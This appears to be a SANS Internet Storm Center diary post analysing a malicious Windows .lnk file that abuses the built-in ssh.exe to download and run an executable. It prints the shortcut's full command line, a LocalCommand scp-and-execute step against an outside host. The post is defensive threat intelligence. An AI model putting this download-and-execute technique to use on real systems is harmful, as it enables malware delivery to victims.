Personal Information Security

Christmas “Gift” Delivered Through SSH, (Fri, Dec 20th)

Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer but the technique used here is interesting.

For a while, Microsoft added SSH support to Windows. I remember the first time I typed “ssh” into a command line and I did not get the wonderful message:

'ssh' is not recognized as an internal or external command

Because ssh is avaiable on many computers today, Attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:

remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk 
ExifTool Version Number         : 12.76
File Name                       : christmas_slab.pdf.lnk
Directory                       : .
File Size                       : 1992 bytes
File Modification Date/Time     : 2024:12:20 05:39:50-05:00
File Access Date/Time           : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time     : 2024:12:20 05:39:50-05:00
File Permissions                : -rwx------
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes                 : Archive
Create Date                     : 2024:10:09 05:37:10-04:00
Access Date                     : 2024:11:05 07:47:23-05:00
Modify Date                     : 2024:10:09 05:37:10-04:00
Target File Size                : 1243648
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Target File DOS Name            : ssh.exe
Drive Type                      : Fixed Disk
Drive Serial Number             : 280C-1822
Volume Label                    : 
Local Base Path                 : C:WindowsSystem32OpenSSHssh.exe
Relative Path                   : ......WindowsSystem32OpenSSHssh.exe
Working Directory               : C:Program Files (x86)MicrosoftEdgeApplication
Command Line Arguments          : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:userspublic. && c:userspublicchristmas-sale.exe" revenge@17[.]43[.]12[.]31
Machine ID                      : christmas-destr

This LNK file will spawn a ssh.exe that will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retried the file.

Somethign else suspicious, the IP belows to Apple:

NetRange:       17.0.0.0 - 17.255.255.255
CIDR:           17.0.0.0/8
NetName:        APPLE-WWNET
NetHandle:      NET-17-0-0-0-1
Parent:          ()
NetType:        Direct Allocation
OriginAS:
Organization:   Apple Inc. (APPLEC-1-Z)
RegDate:        1990-04-16
Updated:        2023-11-15
Comment:        Geofeed https://ip-geolocation.apple.com
Ref:            https://rdap.arin.net/registry/ip/17.0.0.0

I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!

[1] https://www.virustotal.com/gui/file/8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.